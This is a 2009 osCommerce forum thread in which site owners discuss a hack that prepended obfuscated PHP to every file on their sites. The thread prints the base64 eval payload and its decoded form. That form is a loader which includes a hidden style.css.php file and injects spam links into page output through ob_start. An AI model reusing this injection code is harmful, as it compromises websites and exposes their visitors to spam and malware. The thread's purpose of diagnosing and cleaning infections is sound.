Weedwaka Posted September 5, 2009 Share Posted September 5, 2009 I was doing some updating on my site and I notices some strange code appearing in all of my php files at the top . What is this ? I sure as hell did not put it there ? Should I erase it all ? Can I tell when it was added ? <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9pc HcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy 9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9 pcHcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdl cy9idXR0b25zL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb 25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbi BnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzM wODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjcz Mjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBM jA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEOD ZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFI yMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNG QzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDR DFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMz kzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3Qjd BN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4 LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENER ThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RT QxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0Q xQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5 N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxM EVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQU RDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTV CNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRE NzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBN UI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1ME FFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzN FMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMy RjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2Q zczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJy QxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21 sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319 fQ==')); ?> Link to comment Share on other sites More sharing options...
germ Posted September 5, 2009 Share Posted September 5, 2009 click this If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
germ Posted September 5, 2009 Share Posted September 5, 2009 I decoded it and it tells you where one of the hackers files are: if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php')){include_once('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}} If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
♥FIMBLE Posted September 5, 2009 Share Posted September 5, 2009 I found a very similar script in admin / fckeditor / editor / filemanager / browser / default / images / icons / 32 / sytle.css.php in someones site last week, another good reason why people need to increase security, at the very least change the admin folder name. Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Weedwaka Posted September 7, 2009 Author Share Posted September 7, 2009 Thanks for the reply's You were correct on the file being on the hackers. I deleted it and cleaned the other files however now I am having some problems. I cant log into my admin at all . Nothing comes up. I am getting the old permissions warning on the includes/configure.php file which is set to 444 and I cant figure out why. Aaarg !!! Why are people such douche bags ?? Any help with these problems would be greatly appreciated . Link to comment Share on other sites More sharing options...
♥FIMBLE Posted September 7, 2009 Share Posted September 7, 2009 This kind of hack usually writes to EVERY php file on your account, you will need to make sure that they all are clean. I expect that your host has error reporting off, so you will need to view your server error logs or read this article click me to get the code to add Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Weedwaka Posted September 7, 2009 Author Share Posted September 7, 2009 If anybody wants the information from that file, I can email it. It is too long to post. Link to comment Share on other sites More sharing options...
blueflametuna Posted September 7, 2009 Share Posted September 7, 2009 Yup, me too! Same identical signature. Almost every php file within the osCommerce hierarchy. /admin, /catalog. All with the same time stamp of Sep 04 2009 07:36 PST. This is an automated hack. It finds you, embeds itself, and spreads itself around. This appears very similar to one I saw last year. I contacted my hosting provider, and they said there was nothing they could or would do. "Try osCommerce. It's their code vulnerabilities. Fix the scripts." This is one of the reasons I went through the trouble of moving to a new hosting service, and upgrading to the v2.2 RC2a. The previous version had some security issues. Apparently, so does this one. I am about done with trying to clean up my site on a weekly basis. Only to have this garbage re-infecting my site again and again. Link to comment Share on other sites More sharing options...
Weedwaka Posted September 7, 2009 Author Share Posted September 7, 2009 What is the purpose of this code ? Link to comment Share on other sites More sharing options...
blueflametuna Posted September 7, 2009 Share Posted September 7, 2009 I haven't followed all of the logic in this one, but if it is similar to the hack from last year, it embeds the eval stuff at the front of every php file. Which then runs more scripts that have been burried deeper within your file system. I found these in /admin/includes/languages/english/modules/index cnf csi customers.php dg.php lock orders.php s.php skwd style.css.php style.css.php.orig swf Only two of which are my original files: customers.php and orders.php. cnf: ASCII text csi: ASCII text dg.php: PHP script text lock: empty s.php: PHP script text skwd: ASCII text, with CRLF line terminators style.css.php: PHP script text style.css.php.orig: PHP script text swf: Macromedia Flash data (compressed), version 9 csi has an IP address and a UNIX time stamp. The IP address resolves to some tpnet.pl, a dialup service in Warsaw, Poland. The file skwd is a list of random search words: tramadol blackjack craps onlinecasino propecia pokerstars fulltiltpoker gambling casino casinos alprazolam soma ambien cialis ultram viagra fioricet xanax fiericet slot baccarat carisoprodol keno muscle valium deposit deposits levitra zoloft acomplia acyclovir betting realtytrac intercasino zithromax diazepam sildenafil tadalafil valtrex No doubt to be used by Google and other search engines to be linked back to your site, at locations that have nothing to do with your ecommerce content. Last time, it was some porno sites in China and Russia. And visitors to your site will now be the happy beneficiaries of virii. I received threats from people saying that I was a porno spammer. Sheesh. But this variation isd much more sophisticated. The prior version was not nearly as prolific, or buried as deep. I am still faced with the prospect of re-uploading my entire site contents, and resetting all of the directory and file permissions. Hours and hours. And without some reassurance that the vulnerabilities will be fixed in the next six months, I am forced to make the decision to either check the site daily, or to find a new ecommerce solution. Link to comment Share on other sites More sharing options...
Guest Posted September 7, 2009 Share Posted September 7, 2009 It got me as well on two sites. Siteground want $50 to fix it or $150 for a 99.9% solution. What I cannot fathom is what they get out of it!! Link to comment Share on other sites More sharing options...
blueflametuna Posted September 7, 2009 Share Posted September 7, 2009 The hackers get tons of traffic sent to their sites via your server. It is virtually untraceable. And self replicating. This thing could have been sent out months ago. As it finds more sites that support php (osCommerce, specifically), it knows precise vulnerabilities. It is our job to figure out how, and to block yet another hole. But don't expect your service provider's tech support to offer you anything more than README files, and a more expensive solution. That's exactly what I want to do with my next two weeks: Start all over again with yet another eCommerce package, customizing the cosmetics, developing a new database of products, and finding another hosting company. Oh joy. Link to comment Share on other sites More sharing options...
Giovanna Posted September 7, 2009 Share Posted September 7, 2009 Why do all that when you can follow the instructions on how to secure your site in the tips and tricks section. Your host cannot help if you dont make sure your installation is not protected. Main thing is to rename your admin and protect it via your host panel. Read the tips and tricks sectio it is full of information on how to protect yourself and your customers. Link to comment Share on other sites More sharing options...
Giovanna Posted September 7, 2009 Share Posted September 7, 2009 http://www.oscommerce.com/forums/index.php?showtopic=313323 The direct link to the secure your site info. Link to comment Share on other sites More sharing options...
germ Posted September 7, 2009 Share Posted September 7, 2009 Yup, me too! Same identical signature. Almost every php file within the osCommerce hierarchy. /admin, /catalog. All with the same time stamp of Sep 04 2009 07:36 PST. This is an automated hack. It finds you, embeds itself, and spreads itself around. This appears very similar to one I saw last year. I contacted my hosting provider, and they said there was nothing they could or would do. "Try osCommerce. It's their code vulnerabilities. Fix the scripts." This is one of the reasons I went through the trouble of moving to a new hosting service, and upgrading to the v2.2 RC2a. The previous version had some security issues. Apparently, so does this one. I am about done with trying to clean up my site on a weekly basis. Only to have this garbage re-infecting my site again and again. I'd have to disagree. It's been my observation that more often than not it's usually because of the way the site is setup and NOT the software behind it. The site I manage isn't even running the latest V2 of osC and in the 2+ years we've been on the net we've only had two minor "bumps in the road". My observation has been that over 90% of the sites that get hacked are because they have a folder (/images or /catalog/images or /admin/backups usually) set with 777 permissions. It is an undeniable truth that if you have a FOLDER with 777 permissions, because of the way most servers are set up, it's usually only matter of time before you get hacked. Not IF, just WHEN and HOW BAD. Folder permissions should NEVER be higher tha 755 - EVER. These hackers can even get behind the .htaccess file "protecting" the admin if there is a folder back there with 777 permissions. I've seen it happen. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
blueflametuna Posted September 7, 2009 Share Posted September 7, 2009 Thank you for your observation. But there are no folders or files with permissions higher thn 755. Most are 644. There are absolutely no files or folders now, or in the past that were ever set to 777. This was the first thing I checked then, and is something I have just verified again now. Yours is an easy and obvious suggestion, but not valid in this case. The files are owned by my account, and the server runs with my ownership permissions. The software is permitting the server to overwrite my own files in place, then executing them. It does not need "other" write permissions if it can run as the "owner". I submit that there ARE vulnerabilities in the code, and that even with "best practices" and a secure server, these hackers are able to circumvent this and do their evil. They are not logging in, they are not using FTP. These are self-midifying scripting tactics, through some form of an input validation bypass, or form processing technique. Link to comment Share on other sites More sharing options...
germ Posted September 8, 2009 Share Posted September 8, 2009 Then you are among the minority. Security is only as strong as the weakest link. There are a lot of relatively new FTP viruses than can infect your PC, and thru that gain access to your site. If your PC is compromised (and post people can't tell) then your site may be as well. And just because you have an up-to-date antivirus running doesn't necessarily mean your PC is "clean". I used to do a lot of help/posting on an anti-virus/anti malware removal site. Most everyone that had a virus I saw also had an up-to-date antivirus running. I never could figure that one out. There are a few contributions that have known security issues that I have seen. And there might be unknown flaws in the base code. I'm not saying it's immune. I really don't know. My experience is that it's the inexperience of most site owners/operators that leads to problems like this more times than not. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
blueflametuna Posted September 8, 2009 Share Posted September 8, 2009 Like I said, they did not login, and they did not use FTP to "upload" new files. The files were edited in place by prepending the one line <?php eval(base64_decode ... to nearly 1,000 files at once. This has nothing to do with a virus on my PC. It has only to do with a vulnerability within the osCommerce software that they are able to take advantage of. In the previous version, they used global variables. I upgraded to rc2a so that it would no longer use them. Now there is something new, but I suspect, very similar in its design. Unfortunately, I do not have archives of the access logs, so I cannot prove it, nor enough real-time data to pursue a forensics investigation. I am not a newbie. (Or is it NOOB these days?) I do not even attempt to keep up with the current vernacular, or local colloquialisms of new age netiquette. But I can still find my way around a keyboard, and navigate through thousands of lines of code, if need be. It is just frustrating that I should need to. It's a shopping cart app. Link to comment Share on other sites More sharing options...
germ Posted September 8, 2009 Share Posted September 8, 2009 And until you have access to the server logs, and can prove someone was in a particular osC file with a particular URL and did such-and-such (SQL injection or whatever), the real cause is still unkown. Any "finger pointing" at this point in time is mere conjecture. I've only had two minor "blurps" in two and a half years, and they were my fault. It seems to work for the site I manage so I'm staying. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Weedwaka Posted September 8, 2009 Author Share Posted September 8, 2009 I am very much a newbie at php. I probably did leave a door open somewhere for this weenie to get in. I am still trying to get my site back up and running because of this crap =/ Link to comment Share on other sites More sharing options...
Weedwaka Posted September 8, 2009 Author Share Posted September 8, 2009 I haven't followed all of the logic in this one, but if it is similar to the hack from last year,it embeds the eval stuff at the front of every php file. Which then runs more scripts that have been burried deeper within your file system. I found these in /admin/includes/languages/english/modules/index cnf csi customers.php dg.php lock orders.php s.php skwd style.css.php style.css.php.orig swf Only two of which are my original files: customers.php and orders.php. cnf: ASCII text csi: ASCII text dg.php: PHP script text lock: empty s.php: PHP script text skwd: ASCII text, with CRLF line terminators style.css.php: PHP script text style.css.php.orig: PHP script text swf: Macromedia Flash data (compressed), version 9 csi has an IP address and a UNIX time stamp. The IP address resolves to some tpnet.pl, a dialup service in Warsaw, Poland. The file skwd is a list of random search words: tramadol blackjack craps onlinecasino propecia pokerstars fulltiltpoker gambling casino casinos alprazolam soma ambien cialis ultram viagra fioricet xanax fiericet slot baccarat carisoprodol keno muscle valium deposit deposits levitra zoloft acomplia acyclovir betting realtytrac intercasino zithromax diazepam sildenafil tadalafil valtrex No doubt to be used by Google and other search engines to be linked back to your site, at locations that have nothing to do with your ecommerce content. Last time, it was some porno sites in China and Russia. And visitors to your site will now be the happy beneficiaries of virii. I received threats from people saying that I was a porno spammer. Sheesh. But this variation isd much more sophisticated. The prior version was not nearly as prolific, or buried as deep. I am still faced with the prospect of re-uploading my entire site contents, and resetting all of the directory and file permissions. Hours and hours. And without some reassurance that the vulnerabilities will be fixed in the next six months, I am forced to make the decision to either check the site daily, or to find a new ecommerce solution. Interestingly enough, I found most of these in the admin/includes/languages/english/images/buttons folder and not the modules/english folder. I still have not found the style.css.php and style.css.org.php files you mentioned. Thanks for the heads up !! Link to comment Share on other sites More sharing options...
i2Paq Posted September 8, 2009 Share Posted September 8, 2009 I find it strange that if you have directory-acces control on your admin directory they still manage to get in your admin files. If you are on a shared server it could also be related to the fact that the security on that shared server sucks or that one of the sites on that shared servers has issues. Norman in 't Veldt Moderator osCommerce The Netherlands Link to comment Share on other sites More sharing options...
Weedwaka Posted September 8, 2009 Author Share Posted September 8, 2009 I seem to have most of this back up now but I cant log into my admin ? Any ideas ? Link to comment Share on other sites More sharing options...
Weedwaka Posted September 8, 2009 Author Share Posted September 8, 2009 I seem to have most of this back up now but I cant log into my admin ? Any ideas ? Link to comment Share on other sites More sharing options...
Weedwaka Posted September 8, 2009 Author Share Posted September 8, 2009 It does not load up at all . . . just a blank page =/ Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.